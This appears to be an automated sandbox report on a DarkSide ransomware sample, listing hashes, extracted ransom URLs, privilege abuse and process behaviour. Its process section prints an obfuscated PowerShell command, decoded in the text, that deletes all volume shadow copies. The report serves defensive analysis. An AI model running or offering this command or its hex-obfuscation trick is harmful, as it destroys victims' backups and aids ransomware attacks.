Analysis
- max time kernel: 118s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 28-05-2024 05:55
Behavioral task behavioral1
- Sample: 3.exe
- Resource: win7-20240221-en
Behavioral task behavioral2
- Sample: out.exe
- Resource: win7-20240221-en
General
- Target: 3.exe
- Size: 17KB
- MD5: 9009593ebf5ea20407ab19bff045dc9d
- SHA1: 03c1f7458f3983c03a0f8124a01891242c3cc5df
- SHA256: 6931b124d38d52bd7cdef48121fda457d407b63b59bb4e6ead4ce548f4bbb971
- SHA512: fe24a401b35a5b1874bc90739f6fda1969456a13e1339f5b920e6fa659e82df0febc7fc3196ea854601e8773c356884a2516b660daafa944c3643b9d0be74fed
- SSDEEP: 384:SGyUrEk/yEoQE+yckIYN/pBa3AWK3T2oTboHblKR/o:l4klFypIYFpB/x9ngbd
Malware Config
Extracted
C:\Users\README.31635a82.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (139) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource / yara_rule:
  behavioral1/memory/2292-0-0x0000000000160000-0x0000000000170000-memory.dmp  upx
  behavioral1/memory/2292-23-0x0000000000160000-0x0000000000170000-memory.dmp  upx
  behavioral1/memory/2292-210-0x0000000000160000-0x0000000000170000-memory.dmp  upx
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid / Process:
  2292  3.exe
  2292  3.exe
  2056  powershell.exe
  2292  3.exe
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
description / pid / Process:
  Token: SeIncreaseQuotaPrivilege  2292  3.exe
  Token: SeSecurityPrivilege  2292  3.exe
  Token: SeTakeOwnershipPrivilege  2292  3.exe
  Token: SeLoadDriverPrivilege  2292  3.exe
  Token: SeSystemProfilePrivilege  2292  3.exe
  Token: SeSystemtimePrivilege  2292  3.exe
  Token: SeProfSingleProcessPrivilege  2292  3.exe
  Token: SeIncBasePriorityPrivilege  2292  3.exe
  Token: SeCreatePagefilePrivilege  2292  3.exe
  Token: SeBackupPrivilege  2292  3.exe
  Token: SeRestorePrivilege  2292  3.exe
  Token: SeShutdownPrivilege  2292  3.exe
  Token: SeDebugPrivilege  2292  3.exe
  Token: SeSystemEnvironmentPrivilege  2292  3.exe
  Token: SeRemoteShutdownPrivilege  2292  3.exe
  Token: SeUndockPrivilege  2292  3.exe
  Token: SeManageVolumePrivilege  2292  3.exe
  Token: 33  2292  3.exe
  Token: 34  2292  3.exe
  Token: 35  2292  3.exe
  Token: SeDebugPrivilege  2056  powershell.exe
  Token: SeBackupPrivilege  2676  vssvc.exe
  Token: SeRestorePrivilege  2676  vssvc.exe
  Token: SeAuditPrivilege  2676  vssvc.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description / pid / Process / procid_target:
  PID 2292 wrote to memory of 2056  2292  3.exe  28
  PID 2292 wrote to memory of 2056  2292  3.exe  28
  PID 2292 wrote to memory of 2056  2292  3.exe  28
  PID 2292 wrote to memory of 2056  2292  3.exe  28
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Users\Admin\AppData\Local\Temp\3.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\3.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2292
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2292)
    Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    The hex string decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    That is, the sample deletes every volume shadow copy before encrypting, which is what the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe activity below reflect.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: f0f4c1f3fb34afe4cb1dcfc5d10cbc8b
  SHA1: 07e4c1a0c776b8552cabeaa91f19bd458ef5408a
  SHA256: 71978977a81803ec34792fd5d1f0577be42a631ce5f269a66fd36677c200fc41
  SHA512: 5227390e8c7528830a050a51594c12fddd42e03a33db05ea8a7db4695947fbb31251e84698b758052402e8b3d051cefeb442f72f12fb166c51f14dc89ba59f5c
-
  Filesize: 2KB
  MD5: 25d0b19a0ec34a39dfa3e177866f01a3
  SHA1: a3704d1f6499738ccd694bdd6008a850c6b2e453
  SHA256: f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
  SHA512: ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198